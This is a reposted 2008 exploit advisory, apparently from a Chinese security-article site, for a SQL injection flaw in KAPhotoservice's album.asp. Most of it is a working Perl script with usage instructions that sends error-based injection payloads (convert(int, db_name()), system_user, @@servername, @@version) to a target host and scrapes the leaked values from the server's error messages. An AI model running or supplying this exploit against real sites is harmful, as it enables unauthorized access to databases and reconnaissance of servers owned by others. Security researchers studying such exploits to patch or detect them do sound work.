KAPhotoservice (album.asp) Remote SQL Injection Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

KAPhotoservice (album.asp) Remote SQL Injection Exploit

来源：www.spanish-hackers.com 作者：JosS 发布时间：2008-03-19

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                KAPhotoservice (album.asp) Remote SQL Injection Exploit             +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: KAPhotoservice (Payment)
[~] Demo: http://www.kaphotoservice.com/photoservice/
[~] Exploit: Remote SQL Injection [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Vuln File: album.asp

[+] Exploit:

#!/usr/bin/perl

# KAPhotoservice - Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
   $linux="0";
    }else{
    $linux="1";
    }
if($linux){
system("clear");
}
else{
system("cls");
system ("title KAPhotoservice - Remote SQL Injection Exploit");
system ("color 02");
}

}

#*************************** expl ******************************

&lw;

print "\t\t########################################################\n\n";
print "\t\t#    KAPhotoservice - Remote SQL Injection Exploit     #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";

$host=$ARGV[0];
chop $host;
$host=$host."/album.asp?cat=&apage=&albumid=";

if(!$ARGV[0]) {
    print "\n[x] KAPhotoservice - Remote SQL Injection Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl $0 [host]\n";
    print "[x] example: http://host.com/PHPWebquest\n";
    exit(1);
}

@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--');

for ($i=0;$i<=3;$i++)

{

my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;

if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
{

if ($comando[$i] eq "1+and+1=convert(int,db_name())")
{

print "db_name:\n";

$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$dbname\n\n";

}

if ($comando[$i] eq "1+and+1=convert(int,system_user)")

{

print "system_user:\n";

$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$systemuser\n\n";

}

if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")

{

print "servername:\n";

$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$servername\n\n";

}

if ($comando[$i] eq '1+and+1=convert(int,@@version)--')

{

print "version:\n";

$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
print "$version\n\n";

}

} # Cierre del if principal
} # cierre for

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告